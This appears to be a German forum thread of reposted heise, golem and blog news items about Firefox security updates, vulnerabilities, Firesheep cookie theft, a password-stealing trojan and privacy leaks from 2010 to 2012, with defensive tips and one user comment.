Die Mozilla-Entwickler empfehlen, möglichst schnell auf die neue Firefox-Version umzusteigen. Firefox 3.6.2 wird über die Update-Funktion des Webbrowsers verteilt und steht zum Download (http://www.dvbcube.org/index.php?topic=5717.msg129719#msg129719) in diversen Landessprachen (darunter in Deutsch) für Windows, Mac OS X und Linux bereit.
Quelle : www.heise.de
-
Im Mozilla-Security-Blog (http://blog.mozilla.com/security/2010/03/31/plugging-the-css-history-leak/) beschreiben die Entwickler des Firefox-Browsers, wie sie eine uralte Datenschutzlücke stopfen wollen. Der "CSS History Hack" hatte vor kurzem Aufregung ausgelöst, weil er das Ausspähen von Nutzern sozialer Netze ermöglicht. Erstmals wurde das Problem im Jahr 2000 in einem Bugzilla-Eintrag beschrieben.
Es beruht darauf, dass Browser traditionell besuchte und unbesuchte Links unterschiedlich darstellen. Dadurch können Webanwendungen herausfinden, welche Seiten ein Anwender besucht hat. Das W3C hat deshalb bereits in der Spezifikation von CSS 2.1 festgelegt, dass Browser "alle Links als unbesucht darstellen oder andere Maßnahmen ergreifen können, um die Privatsphäre des Benutzers zu gewährleisten".
Für die zweite Variante wollen sich die Mozilla-Entwickler entscheiden, indem sie nur noch bestimmte Attribute für die Pseudoklasse :visited zulassen. Attribute, die entfernte Ressourcen laden (etwa background-image, wird der Browser ignorieren. Außerdem soll die Layout-Engine alle Links in derselben Geschwindigkeit positionieren, sodass Anwendungen kein unterschiedliches Zeitverhalten ausnutzen können. Schließlich wird die JavaScript-Methode getComputedStyle in Zukunft auch für besuchte Links die CSS-Attribute der unbesuchten liefern.
Die angekündigten Änderungen sollen demnächst in den Entwicklungszweig des Browsers einfließen. Am Aussehen der meisten Webseiten werde sich dadurch nichts ändern, so die Firefox-Entwickler.
Quelle : www.heise.de
-
Erst vor einer Woche hatte die Mozilla-Foundation die Version 3.6.2 des Open-Source-Webbrowsers Firefox veröffentlicht und damit mehrere Sicherheitslücken geschlossen. Nun folgt mit Version 3.6.3 ein weiteres Security-Update. Laut den Release-Notes enthält Firefox 3.6.2 eine kritische Lücke, die das Ausführen von beliebigem Code ermöglichen könnte.
Versionen vor Firefox 3.6 sollen von dem Problem nicht betroffen sein. Firefox 3.6.3 steht zum regulären Download bereit und wird über die automatische Update-Funktion verteilt.
Quelle : www.heise.de
-
Nach Verwirrung um die Frage, wem das Zertifikat "RSA Security 1024 V3" gehört, hat Mozilla entschieden, es aus der Liste vertrauenswürdiger Root-Zertifikate für seine Software zu entfernen.
Ein Root-Zertifikat erlaubt es, beliebig viele Zertifikate für Webseiten auszustellen, denen ein Browser, der dem Root-Zertifikat vertraut, ebenfalls vertraut. Daher kommt Besitzern solcher Root-Zertifikate eine große Verantwortung zu. Doch bei der Überprüfung des Zertifikats "RSA Security 1024 V3" stieß Mozillas Kathleen Wilson auf Ungereimtheiten. Der Besitzer des Zertifikats ließ sich nicht ermitteln.
Nach einer kurzen öffentlichen Diskussion (http://groups.google.com/group/mozilla.dev.security.policy/browse_thread/thread/b6493a285ba79998/26fca75f9aeff1dc?pli=1) und weiteren Nachforschungen bestätigte RSA, das aus dem Jahre 2001 stammende Zertifikat einst ausgestellt zu haben. Es ist noch bis 2026 gültig. RSA bestätigte auch, im Besitz des privaten Schlüssels für des Zertifikat zu sein, das aber nicht länger gebraucht werde und daher entfernt werden könne.
So wird es dann auch kommen: Mozilla wird das Zertifikat aus seiner Liste der vertrauenswürdigen Root-Zertifikate entfernen. Diese von Wilson geführte Liste steht unter mozilla.org für jeden zur Einsicht bereit.
Das Root-Zertifikat "RSA Security 1024 V3" findet sich im Übrigen auch bei anderen Softwareherstellern in der Liste der vertrauenswürdigen Zertifikate.
Quelle : www.golem.de
-
In der nun vorgelegten (https://www.mozilla.com/en-US/firefox/3.6.4/releasenotes/) Version 3.6.4 des Web-Browsers Firefox sollen Abstürze von Adobes Flash-, Apples Quicktime- oder Microsofts Silverlight-Plug-in nicht mehr den kompletten Browser mit in den Abgrund ziehen. Vielmehr soll das Weitersurfen in anderen geöffneten Tabs möglich sein. Zudem soll sich das abgestürzte Tab durch einfaches Neuladen (Refresh) wiederbeleben lassen.
Gerade für Anwender, die mit mehreren Tabs arbeiten, dürfte die neue Funktion die Arbeit erleichtern, bringen doch gerade Flash-Applets den Mozilla-Browser immer mal wieder zum Stillstand. Wie gut das in der Praxis funktioniert, muss sich noch zeigen.
Version 3.6.4 beseitigt sieben Sicherheitslücken, von denen die Entwickler vier als kritisch einstufen. Davon sind auch Firefox 3.5.9, Thunderbird 3.0.4 sowie SeaMonkey 2.0.4 betroffen, für die nun ebenfalls jeweils korrigierte Fassungen vorliegen (Firefox 3.5.10 , Thunderbird 3.0.5 sowie SeaMonkey 2.0.5).
Update : Eine von Michal Zalweski entdeckte Möglichkeit für URL-Spoofing wurde indes noch nicht beseitigt. Zalewski hat dazu eine kurze Demo programmiert, die zeigt, wie sich beim Laden einer leeren Seite eine beliebige URL in der Adress-Leiste einblenden lässt und man anschließend den Inhalt manipulieren kann. Zalweski hat die Informationen nach eigenen Angaben schon jetzt veröffentlicht , weil er annahm, dass die Entwickler die Lücke bereits in Version 3.6.4 geschlossen hätten. Dies soll nun in der kommenden Version 3.6.6 geschehen – Version 3.6.5 wird übersprungen. Safari hat ein ähnliches Problem.
Quelle : www.heise.de
-
Offenbar hat bereits Robert Hansen (aka RSnake) die Lücke vor Zalewski entdeckt und schon im Dezember 2009 auf ha.ckers.org eine ähnliche, aber praktikablere Demo und eine Beschreibung dazu veröffentlicht. RSnakes Demo verschleiert die Herkunft eines Plug-in-Downloads. Während sich die originale Firefox-Add-on-Seite im Browser öffnet, versucht gleichzeitig die Seite ha.ckers.org dem Anwender eine (harmloses) Erweiterung unterzuscheiben.
Quelle : www.heise.de
-
Firefox 3.6.9 unterstützt den X-FRAME-OPTIONS-Header, mit dem Webserver dem Client verbieten können, nachgeladene Seiten in IFrames zu öffnen. Beim Clickjacking schiebt die Webseite eines Angreifers einen durchsichtigen iFrame mit Inhalten von beispielsweise Facebook unter den Mauszeiger. Im Glauben, etwas auf der angezeigten Seite anzuklicken, klickt der Anwender jedoch auf Elemente in einem durchsichtigen, zu Facebook gehörenden iFrame.
Mitte des Jahres fielen mehrere hundertausend Facebook-Anwender einer Clickjacking-Attacke zum Opfer, als sie auf einer präparierten Seite unbewußt auf einen versteckten "Gefällt mir"-Button ("Like") geklickt hatten. Durch die neue Option könnte Facebook künftig bei Firefox-Anwendern verhindern, dass ein Angreifer Inhalte in einem IFrame laden kann. Allerdings unterstützen bereits der Internet Explorer 8 und Chrome die Option – und trotzdem nutzt Facebook die Option (noch) nicht.
Firefox 3.6.9 schließt zudem mehr als 14 Sicherheitslücken, wovon die Entwickler mindestend 10 als kritisch einstufen. Dazu gehört neben Integer und Heap Overflows sowie verwaisten Zeigern auch die Schwachstelle beim Nachladen von DLLs über das Netz für die Windows-Version von Firefox. Daneben sind auch Firefox 3.5.12, Thunderbird 3.1.3, Thunderbird 3.0.7 und SeaMonkey 2.0.7 erschienen, in denen dieselben Lücken geschlossen wurden.
Quelle : www.heise.de
-
Die Firefox-Entwickler haben die Versionen 3.6.10 und 3.5.13 vorgelegt, mit der die bei den Vorgangerversionen auftretenden Abstürze (http://www.dvbcube.org/index.php?topic=5717.msg141023#msg141023) beim Start behoben sind. Die Korrektur (https://bugzilla.mozilla.org/attachment.cgi?id=475126&action=edit) umfasst nur eine erweiterte if-Abfrage in Zusammenhang mit der Ausführung von Skripten.
Die Entwickler weisen darauf hin, dass der Fehler die übliche Crash-Rate beim Firefox nicht wesentlich erhöht habe. Da der Absturz aber bei betroffenen Anwendern immer beim Start aufgetreten sei und somit die Benutzung des Browsers unmöglich gemacht habe, sei dem Problem besondere Bedeutung beigemessen worden.
Die Mozilla Foundation hatte deshalb die Verteilung der Versionen 3.6.9 und 3.5.12 über das automatische Update ausgesetzt. Stattdessen werden nunmehr die aktuellen Versionen verteilt. In Version 3.6.10 wurde zusätzlich ein Problem in Zusammenhang mit dem Skin-Manager Personas Plus gelöst.
Quelle : www.heise.de
-
Statt alle Tastatureingaben mitzulesen, soll sich ein kürzlich von Webroot analysierter Schädling darauf verlassen, dass Kennwörter für Webseiten im Passwortspeicher des Browsers liegen. Damit er dort auch alle interessanten Passwörter vorfindet, hilft der Trojan-PWS-Nslog getaufte Schädling bei Firefox ein bisschen nach: Durch wenige Manipulationen in einer zu Firefox gehörenden Java-Script-Datei bringt er den Browser dazu, Login-Daten automatisch und ohne Nachfrage beim Anwender zu speichern.
(http://www.heise.de/imgs/18/5/8/1/8/6/0/170b86f4efe910c4.png)
Dazu kommentiert der Schädling unter anderem die Nachfrage von Firefox in der Datei nsLoginManagerPrompter.js einfach aus und fügt eine Zeile zum automatischen Speichern hinzu. heise Security konnte die Wirksamkeit der Manipulationen nachvollziehen – die der Malware-Autor vermutlich einem bereits seit 2009 bekannten Workaround entlehnt hat.
Normalerweise fragt Firefox beim Anwender nach, ob er die Daten speichern soll; viele Anwender verneinen aus Sicherheitsgründen die Nachfrage, weil Schädlinge im Passwortspeicher zuerst nachschauen und die ausgelesenen Daten verschicken. Auch PWS-Nslog versucht, die Daten minütlich aus den Speichern des Internet Explorer und Firefox auszulesen und an einen Server zu verschicken.
Nach Analysen von Webroot hat sich der Autor der Malware keine Mühe gegeben, seine Spuren zu verwischen. Im Schädling finden sich ein Name nebst GMail-Adresse. Darüber stieß Webroot schnell auf die Facebook-Seite des vorgeblich iranischen Entwicklers, der nach eigenen Angaben aus Spaß Crimeware programmiert.
Quelle : www.heise.de
-
Die Manipulation funktioniert prinzipiell auf allen Plattformen, auf denen der Trojaner die Rechte zur Änderung der Datei nsLoginManagerPrompter.js hat. Im Test funktionierte dies sowohl unter Windows XP, Windows 7 und Ubuntu 10.04. Unter Windows 7 und Ubuntu arbeitet der Anwender jedoch standardmäßig mit eingeschränkten Rechten, sodass ein Schädling dort ohne weitere Tricks die Datei nicht manipulieren kann.
Quelle : www.heise.de
-
Die Mozilla Foundation vergibt regelmäßig Prämien an Sicherheitsspezialisten für den Erhalt von Informationen über kritische Lücken in seinem Web-Browser Firefox. Diesmal hat jedoch ein 12-Jähriger für das Finden einer Sicherheitslücke eine Prämie von 3000 US-Dollar erhalten.
Der US-Amerikaner Alexander Miller hatte einen kritischen Fehler in einer JavaScript-Funktion entdeckt und gemeldet. Ausgerechnet eine der am häufigsten benutzten JavaScript-Funktion document.write reagierte in seinen Tests auf sehr lange Zeichenketten mit einem Buffer Overflow, der sich vermutlich zum Einschleusen und Starten von Code ausnutzen lässt. Die Entwickler haben den Fehler neben anderen in den Firefox-Versionen 3.6.11 und 3.5.14 sowie Thunderbird 3.1.5 und 3.0.9 behoben – Alex Miller ist in den Credits als "Security Researcher" aufgeführt.
In US-Medien gab der 12-Jährige an, durch die Erhöhung der Prämie von 500 auf 3000 US-Dollar angespornt worden zu sein. Der Aufwand für die Suche nach einem preiswürdigen Fehler habe ihn jeweils 90 Minuten an 10 Tagen gekostet. Zuvor habe er bereits eine andere Lücke entdeckt und an die Mozilla Foundation gemeldet; sie erfüllte jedoch nicht die Anforderungen.
Quelle : www.heise.de
-
Die auf der ToorCon vorgestellte Firefox-Erweiterung Firesheep (http://codebutler.com/firesheep) demonstriert eindrucksvoll, wie leicht sich Angreifer Zugriff auf Benutzeraccounts anderer Netzwerknutzer verschaffen können, wenn sie im gleichen Netz – etwa in einem unverschlüsselten WLAN – unterwegs sind. Nach einem Klick auf den Start-Button tauchen in der Sidebar nach und nach die Benutzer-Accounts der anderen Nutzer auf, sobald diese auf einer der vielen unterstützten Web-Angeboten herumsurfen. Derzeit werden unter anderem Facebook, Twitter, Flickr, Amazon, Windows Live und auch Google unterstützt. Klickt der Angreifer auf einen der gesammelten Einträge, zu dem Firesheep oft gleich auch noch Namen und Benutzerbild des Opfers anzeigt, ist er mit allen Rechten auf der jeweiligen Seite eingeloggt.
(http://www.heise.de/imgs/18/5/8/6/8/7/1/a7feb421c104ec5f.png)
Account-Klau leicht gemacht: Firesheep
sammelt Cookies anderer Netzwerknutzer.
Firesheep hat es nicht auf das Passwort abgesehen, sondern übernimmt die aktive Session anhand des Cookies, der mit jedem Seitenaufruf – meist unverschlüsselt – übertragen wird. Viele Dienste wickeln nur den eigentlichen Login-Vorgang verschlüsselt ab. Ganz neu ist dieses Angriffsszenario nicht: Robert Graham von Errata Security hat das in ähnlicher Form bereits vor drei Jahren auf der Black-Hat-Konferenz demonstiert.
Firesheep läuft unter Mac OS X und Windows. Unter Windows setzt es die Installation von WinPcap voraus. Die Unterstützung für weitere Seiten kann der Angreifer über Scripte hinzufügen. Viele der betroffenen Webseiten bieten durchaus die Option, sämtliche Anfragen verschlüsselt über HTTPS abzuwickeln, was den Cookie-Klau verhindert. Die Firefox-Erweiterung HTTPS Everywhere (http://www.heise.de/meldung/Automatische-Webverschluesselung-fuer-fast-ueberall-1025400.html) wechselt bei bekannten Seiten automatisch auf die verschlüsselte Version, sofern eine solche angeboten wird.
Quelle : www.heise.de
-
Eine weitere Alternative zu HTTPS Everywhere ist die Erweiterung ForceTLS (https://addons.mozilla.org/en-US/firefox/addon/12714/), die euren Browser dann zu HTTPS statt HTTP zwingt, sofern die Seite das Protokoll unterstützt (Facebook, Twitter und Google Mail tun dies).
(http://img822.imageshack.us/img822/4887/howtoconfigure550x399.jpg)
(http://img822.imageshack.us/img822/517/enterdomaintoforce11550.jpg)
Also – Vorsicht ist besser als Nachsicht ;)
Quelle: Caschys Blog (http://stadt-bremerhaven.de)
-
Bei den am Dienstag gemeldeten Trojaner-Angriffen auf Windows-PCs von Besuchern der Webseite des Friedensnobelpreises haben Kriminelle eine bislang unbekannte Lücke in Firefox verwendet. Genaue Informationen zu der Lücke liegen noch nicht vor. Der Zugriff auf den Bugzilla-Datenbankeintrag (https://bugzilla.mozilla.org/show_bug.cgi?id=607222) ist nur registrierten Entwicklern gestattet.
Dass Angreifer unbekannte Lücken in Firefox ausnutzen, kommt nicht besonders häufig vor. Mitte des vergangenen Jahres tauchte zwar ein Zero-Day-Exploit für Firefox auf, der wurde aber zu dem Zeitpunkt noch nicht für aktive Angriffe missbraucht.
Die Mozilla Foundation hat den neuen Fehler für die Versionen 3.6 und 3.5 bestätigt und stuft ihn als kritisch ein. Der Hersteller arbeitet an einem Patch; bis dahin empfiehlt er, JavaScript zu deaktivieren oder das Plug-in NoScript zu verwenden, um Angriffe ins Leere laufen zu lassen.
Zwar ist die Webseite des Friedensnobelpreises mittlerweile desinfiziert, die Mozilla Foundation vermutet jedoch, dass bereits andere Webseiten den Exploit enthalten und zur Verteilung von Malware benutzen. Wieviele Anwender dem Angriff zum Opfer fielen, ist unbekannt.
Nach Analysen von Trend Micro versucht der Exploit jedoch, nur ältere Windows-Versionen mit Firefox 3.6.x zu infizieren. Bei Windows 7 und Vista (die der Exploit am Browser-Header erkennt) bleibt der Exploit inaktiv – vermutlich weil er dort zu viele Sicherheitshürden nehmen müsste. Der Exploit installiert eine Backdoor (BKDR_NINDYA.A.), die mit verschiedenen Servern Kontakt aufnimmt.
Quelle : www.heise.de
-
Die Mozilla-Foundation hat die Updates 3.6.12 und 3.5.15 für Firefox sowie Thunderbird 3.1.6 und 3.0.10 für Windows, Linux und Mac OS X veröffentlicht. Sie schließen die kürzlich bekannt gewordene Sicherheitslücke, die bereits für aktive Angriffe auf PCs von Windows-Anwendern benutzt wurden. Die Lücke soll in der Suite SeaMonkey in Version 2.0.10 ebenfalls geschlossen sein. Zum Download steht aber weiterhin nur 2.0.9 zur Verfügung.
Die Lücke beruht nach Angaben der Mozilla Foundation auf einem Heap Overflow in Zusammenhang mit einer kombinierten Verwendung der JavaScript-Funktionen document.write() und appendchild(). Mit den Updates haben die Entwickler innerhalb von zwei Tagen nach Bekanntwerden des Problems reagiert.
Quelle : www.heise.de
-
Seit einigen Tagen macht Firesheep im Netz (beziehungsweise offenen Netzen) die Runde. Sicher ist der, der sichere Verbindungen mit den Servern aufbaut. Neben diversen Erweiterungen für Browser gibt es jetzt auch das kleine Windows-Progrämmchen FireShepherd (http://notendur.hi.is/~gas15/FireShepherd/).
(http://img264.imageshack.us/img264/7758/sheepherd.png)
Dieses Programm flutet das offenen Netz mit sinnlosen Informationen für Firesheep, sodass dieses sich in das digitale Nirvana verabschiedet.
Quelle: Caschys Blog (http://stadt-bremerhaven.de)
-
Die Entwickler von Firesheep stehen zwar weiterhin unter heftiger Kritik für die Veröffentlichung ihres Cookie-Klau-Plug-ins. Allerdings haben sie damit bereits bewirkt, dass Microsoft nun seinen E-Mail-Dienst Hotmail/Windows Live komplett auf SSL umstellen will. Das berichtet die US-Newseite Digital Society. Die Umstellung soll noch im November erfolgen.
Bislang war standardmäßig nur die Übertragung der Anmeldedaten im Browser verschlüsselt, die anschließende Übertragung der Seiten und des Anmelde-Cookies erfolgte im Klartext. Firesheep ist in der Lage, etwa in öffentlichen WLANs diese Daten zu sammeln und zum Zugriff auf fremde Konten bereit zu stellen. Das Tool ist so einfach zu bedienen, dass auch Skript-Kiddies etwa im Starbucks nebenan damit Schindluder treiben können.
Tools wie FireShepard versuchen die Datenkollekte von Firesheep zu stören, indem sie das WLAN mit Daten zumüllen und das Plug-in damit zum Absturz bringen. Das grundlegende Problem löst dieser Gegenangriff jedoch nicht. Plug-ins wie HTTPS Everywhere für Firefox können immerhin eine automatische Umleitung auf SSL-gesicherten Seiten vornehmen – aber nur, wenn der Server dies auch unterstützt.
Facebook hat angekündigt, für die nicht durchgängige Verschlüsselung der Verbindung in den kommenden Monaten eine Lösung parat zu haben. Bis dahin solle man beim Senden und Empfangen von Daten in öffentlichen WLANs vorsichtig sein. Betroffen sind noch viele weitere Dienste und Seiten, darunter Twitter, Flickr und Amazon.
Ein Anekdote zu praktischen Tests mit Firesheep erzählt der Entwickler Gary LosHuertos in seinem Blog. Nach dem Sammeln von mehreren Zugriffsdaten für Facebook und andere Konten in einem Starbucks-Cafe versuchte er, die Opfer auf das Problem aufmerksam zu machen. Dazu sendete er teilweise über deren eigene Facebook-Konten Warnungen, dass man auf ihre Konten zugreifen könne.
Einige reagierten zwar, indem sie sich kurz abmeldeten. Kurze Zeit später waren sie aber wieder "drin" und reagierten auf weitere Warnungen nicht mehr. LosHuertos' Fazit seines kurzen Tests: Die eigentliche Sicherheitslücke liegt immer in der (falschen) Einschätzung der Bedrohung durch den Anwender.
Quelle : www.heise.de
-
Microsoft hatte schon im September angekündigt, Hotmail durchgehend verschlüsseln zu wollen. Somit ist dies doch keine direkte Reaktion auf Firesheep.
Quelle : www.heise.de
-
Die Resonanz auf das Firefox-Plug-in Firesheep ist weiterhin gewaltig, weil es so einfach zu bedienen ist und weiterhin zahlreiche Dienste und damit auch Anwender verwundbar sind. Mit Firesheep kann sich ein Angreifer in öffentlichen Netzen Zugriff auf die Accounts anderer Netzwerknutzer verschaffen. Rund 673.000 Downloads zeigt der Zäher auf github.com bislang an.
Unterdessen machen sich Sicherheitsforscher Gedanken darüber, wie man Angriffe mit dem Tool erkennen, abwehren oder verfeinern kann. Der Sicherheitsdienstleister ZScaler hat zur Alarmierung von Anwendern das Firefox-Plug-in Blacksheep veröffentlicht. Es sendet gefälschte Cookies ins Netz und beobachtet, ob jemand mit dem mitgelesenen Cookie versucht, auf eine Webseite zuzugreifen. Geschieht dies, so setzt jemand im Netz Firesheep oder ähnliche Tools ein. Blacksheep blendet dann im Browser eine Warnung mit der IP-Adresse des Angreifers ein. Blacksheep beruht auf dem Quellcode von Firesheep.
Blacksheep funktioniert laut Zscaler unter WIndows und Mac OS X, eine Linux-Version soll bald folgen. Unter Windows ist zusätzlich die Installation der Netzwerkbibliothek WinPcap erforderlich. Allerdings unterstützt WinPcap nicht jeden WLAN-Treiber, sodass Blacksheep nicht von jedem Windows-Anwender im WLAN nutzbar ist.
Das Unternehmen Antago hingegen hat eine Anleitung vorgestellt , wie man mit Firesheep auch in geswitchten Netzen auf einfache Weise Cookies sammeln kann. Standardmäßig ist Firesheep bislang auf geteilte Übertragungsmedien, also etwa unverschlüsselte WLANs, beschränkt, beziehungsweise auf solche, in denen alle den gleichen Schlüssel benutzen. Dann kann jeder alle Pakete im WLAN mitlesen.
In kabelgebundenen, geswitchten Netzwerken sieht man normalerweise nur den eigenen Datenverkehr und nicht den der anderen Anwender. Mit ARP-Spoofing kann man aber den Verkehr anderer PCs über seinen PC umleiten (MiTM), indem man den ARP-Cache anderer Systeme und die Zuordnung von Mac- zu IP-Adresse manipuliert. Weitere Infos zu ARP-Spoofing enthält der Artikel "Angriff von innen - Technik und Abwehr von ARP-Spoofing-Angriffen " auf heise Security.
Antagos Anleitung zeigt, wie man ein frei verfügbares ARP-Spoofing-Tool mit einem kleinen Windows-Programm und Firefox kombiniert. Ein Klick genügt dann, um den Datenverkehr eines bestimmten PC mitzulesen und Cookies zu sammeln. Neu ist diese Angriffsvariante nicht, sie ist aber auch für weniger fortgeschrittene Nutzer leicht nachvollziehbar. Vermutlich dürften Angriffsversuche mit Firesheep demnächst in Unternehmensnetzen verstärkt zu beobachten sein. Antego will mit seiner Anleitung nach eigener Aussage Webseiten wie Facebook, Wer-kennt-wen, StudiVZ und anderen zu einer (schnelleren) Sicherung ihre Seiten bewegen.
Microsoft will noch in diesem jahr seine Mail-Dienste auf SSL umstellen, Facebook irgendwann in den nächsten Monaten.
Quelle und Links : http://www.heise.de/newsticker/meldung/Wettruesten-beim-Cookie-Klau-Tool-Firesheep-1132720.html
-
Die Sicherheitsexperten von SANS haben auf eine Schwachstelle in Mozilla Firefox 3.6.12 aufmerksam gemacht.
Ein italienisches Entwickler-Team mit Namen Backtrack hat laut SANS (http://isc.sans.edu/diary.html?storyid=9937&rss) Internet Storm Center den Exploit-Code entwickelt. Damit lässt sich von außerhalb ein so genannter Denial-of-Service-Angriff auf Firefox ausüben.Den Code selbst veröffentlicht SANS nicht. Dieser sei aber einfach mittels Suchmaschinen zu finden, da die Programmzeilen bereits auf einigen Portalen herumgeistern.
Quelle : www.tecchannel.de
-
Eine Schwachstelle im WebSocket-Design hat die Mozilla-Foundation veranlasst, die Unterstützung des Protokolls ab der kommenden Beta-Version 8 für Firefox 4 abzuschalten. Die Schwachstelle ermöglicht es in Zusammenhang mit transparenten Proxies, deren Caches zu vergiften und manipulierte Seiten einzuschleusen.
Ein Angreifer könnte auf diese Weise ein präpariertes JavaScript für Google Analytics in den Proxy-Cache schleusen, das bei allen weiteren Anfragen an die Clients ausgeliefert und in deren Browser ausgeführt wird. Das Problem wurde von einer Forschergruppe bereits im November auf der IETF-Mailingliste beschrieben. In ihrem Dokument machen die Forscher Vorschläge, wie man die Schwachstelle beseitigt.
Die Firefox-Entwickler wollen WebSockets erst wieder anschalten, wenn eine neue, verbesserte Version des Protokolls verabschiedet wird. Der Code bleibt aber weiter im Firefox enthalten, Entwickler können sie für Testzwecke über eine versteckte Option auch wieder aktivieren. Aktuell ist die Protokollversion 76, die bereits von Chrome und Safari unterstützt wird. WebSockets ermöglichen eine dauerhafte Verbindung zwischen Client und Server, wobei der Server eigenständig Daten an einen Client senden kann. Bei herkömmlichen Verbindungen wird der Server vom Client dazu per GET oder POST aufgefordert.
Quelle : www.heise.de
-
Das britische Unternehmen Context hat bei seiner Untersuchung von WebGL-Implementierungen eine Sicherheitslücke im freien Browser Firefox 4 entdeckt. Dadurch kann ein Angreifer mit einer geeignet präparierten Webseite Screenshots jedes Bildschirmfensters anfertigen. Diese Lücke ist spezifisch für die WebGL-Implementierung in Firefox und tritt nicht in Chrome auf.
In der nächsten Version des Browsers, die um den 21. Juni erscheinen soll, haben die Firefox-Entwickler den Fehler korrigiert. Alternativ können Anwender bereits jetzt eine Beta-Version des Browsers verwenden oder WebGL in seiner about:config-Seite abschalten. Bereits im Mai hatte Context eine Sicherheitslücke in WebGL aufgedeckt, durch die sich per gezielter Überlastung der Grafikkarte unter Windows 7 ein Bluescreen erzeugen ließ. Eine weitere Schwachstelle erlaubte das Umgehen der Same-Origin-Policy. Die Firefox-Entwickler hatten daraufhin in Version 5 des Browsers eine WebGL-Funktion abgeschaltet .
Quelle : www.heise.de
-
Mozilla hat außer der Reihe ein Sicherheitsupdate für Firefox veröffentlicht, mit dem das SSL-Root-Zertifikat von Diginotar deaktiviert wird. Mozilla reagiert damit auf ein gefälschtes Google-Zertifikat.
Mozilla reagiert wie angekündigt auf ein von Diginotar in Umlauf gebrachtes, gefälschtes SSL-Zertifikat, das alle Subdomains von google.com betrifft, und hat das Root-Zertifikat von Diginotar in Firefox 6.0.1 und Firefox 3.6.21 deaktiviert. Damit erkennen die neuen Firefox-Versionen keine von Diginotar ausgestellten Zertifikate mehr als gültig an.
Eigentlich will Mozilla keine Updates von Firefox außerhalb der alle sechs Wochen stattfindenden Rapid-Releases veröffentlichen. Da das gefälschte Google-Zertifikat aber bereits ausgenutzt wurde, sah sich Mozilla offenbar zum Handeln gezwungen. Auch Microsoft hat Updates angekündigt.
Weitere Änderungen sind in den neuen Firefox-Versionen nicht enthalten. Mozilla rät Nutzern von Firefox trotz des dafür verfügbaren Sicherheitsupdates zum Wechsel auf Firefox 6.0.1. Die neuen Versionen stehen unter mozilla.org/firefox zum Download bereit.
Quelle : www.golem.de
-
Das Firefox-Addon ShowIP sendet die URLs besuchter Webseiten unverschlüsselt an einen Webdienst namens ip2info.org, berichten Sicherheitsexperten von Sophos in einem Blogbeitrag. Dabei beschränkt sich die Browser-Erweiterung nicht nur auf den normalen Browser-Modus, sie übermittelt auch die per HTTPS aufgerufenen sowie alle im "Private Modus" angesteuerten URLs.
ShowIP zeigt in der Statusleiste des Browsers die IP-Adressen (IPv4/v6) der besuchten Webseite an und bietet darüber hinaus Zugriff auf Dienste wie whois und netcraft. Daher ist die Erweiterung besonders bei Netzwerkern und Entwicklern beliebt, laut Mozilla haben fast 170.000 Firefox-Nutzer das Addon installiert.
Das beschriebene Verhalten zeigen die seit dem 19. April veröffentlichten Versionen 1.3 und neuer. Während auf der Mozilla-Addon-Seite viele Nutzer vor dieser Verletzung der Privatsphäre warnen, versprach der Nutzer ShowIP Dev Team dort inzwischen für die Übertragung der Daten möglichst schnell HTTPS im Addon einzuschalten. Der Dienst ip2info.org gehört laut whois-Eintrag der Marketing- und SEO-Agentur "hats on marketing", einem Tochterunternehmen der Efamous GmbH aus Hofheim/Taunus. Das Unternehmen hat die Weiterentwicklung des Addons offenbar vom ursprünglichen Entwickler Jan Dittmer übernommen.
Quelle : www.heise.de
-
In den aktuellen Tor-Browser-Bundles (2.2.35-9 auf Windows, 2.2.35-10 auf Mac OS und Linux) wurde ein schwerer Sicherheitsfehler gefunden, die die vom Tor-Netzwerk versprochene Anonymität des Surfers gefährdet: Kommuniziert der im Bundle steckende Firefox über Websockets mit Servern, fragt der Browser das Domain Name System nicht über das Tor-Netz ab und verrät damit potenziellen Lauscher die besuchten Server.
(http://www.heise.de/imgs/18/8/3/4/6/3/6/304667d44fe12a64.png)
Das Problem lässt sich derzeit nur per Hand abschalten, erklären die Autoren der Fehlermeldung im Tor-Blog (https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs): Über die erweiterten Firefox-Einstellungen (nach der Eingabe von "about:config" in der Navigationleiste) lässt sich die Nutzung von Websockets deaktivieren. Die Tor-Entwickler arbeiten zudem gerade an einem neuen Tor-Browser-Bundle und versprechen dort einen bessere Lösung des Problems.
Quelle : www.heise.de
-
Firefox (13.02 erscheint bald) ist mittlerweile bekanntlich auch im Besitz einer Seite, die oft aufgerufene Seiten mit einem Screenshot zeigt. Kennt man ja auch von Chrome oder Opera. Auf der Seite des neuen Tabs sehen wir also diverse Seiten, inklusive automatisch generiertem Thumbnail. Diese Seite zeigt allerdings unter Umständen Dinge an, die man nicht so sehen will, bzw. sehen lassen will.
Neben Thumbnails normaler Seiten werden nämlich auch Screenshots von gesicherten https:-Verbindungen angefertigt. Und so zeigt diese kleine Vorschau unter Umständen mal den Kontostand oder weitere Details an.
(http://img404.imageshack.us/img404/9080/postbank590x170.jpg)
Mozilla kündigte an, dass man in zukünftigen Versionen dieses Problem angehen wolle. Wer bereits jetzt schon eingreifen möchte, der sollte den privaten Modus nutzen oder das Feature des neuen Tabs abschalten. Dazu in der Adresszeile einfach about:config eingeben und den Wert browser.newtab.url auf about:home setzen. Skandal? Besonders schlimm? Nein. Dinge, die ich an einem PC mache, die auf der Seite des neuen Tabs auftauchen können, würde ich eh nur an meinem privaten Rechner machen, der durch diverse Mechanismen vor dem Auge anderer Menschen gesichert ist.
Quelle: Caschys Blog (http://stadt-bremerhaven.de)
-
Genau diese Dinge mache ich weder auf meinem noch irgendeinem fremden Rechner, bzw. nie über dort installierte Browser.
Das passiert hier allein über eine portable Version auf einem Stick, und die ist natürlich sehr spezifisch eingestellt und wird nur für diesen Zweck verwendet.
Nutzung auf Fremdrechnern kommt normalerweise auch nicht vor, es sei denn, ich betreue diese ohnehin dauernd persönlich.
Auch die unentbehrliche Sicherheitskopie gibt's auf keinem Rechner, sondern nur auf einem anderen kleinen externen Datenträger, den wirklich niemand finden würde...
Jürgen
-
Die personalisierte Übersicht zuletzt besurfter Seiten sollte es Nutzern seit Firefox 13 auf einem neuen Tab leichter machen, ihre oft genutzten Seiten wiederzufinden. Doch die per Zufallsprinzip während der Benutzung aufgenommenen und lokal gespeicherten Bilder zeigten oft HTTPS-geschützte private Sitzungen, beispielsweise von Onlinebanking- oder Webmail-Sessions. Die Nutzer beschwerten sich: Nun soll dieser Fehler in Firefox 14 behoben sein.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/New-Tab-Keine-Hinweise-mehr-auf-geschuetzte-Sitzungen-in-Firefox-1647531.html)
Quelle : www.heise.de
-
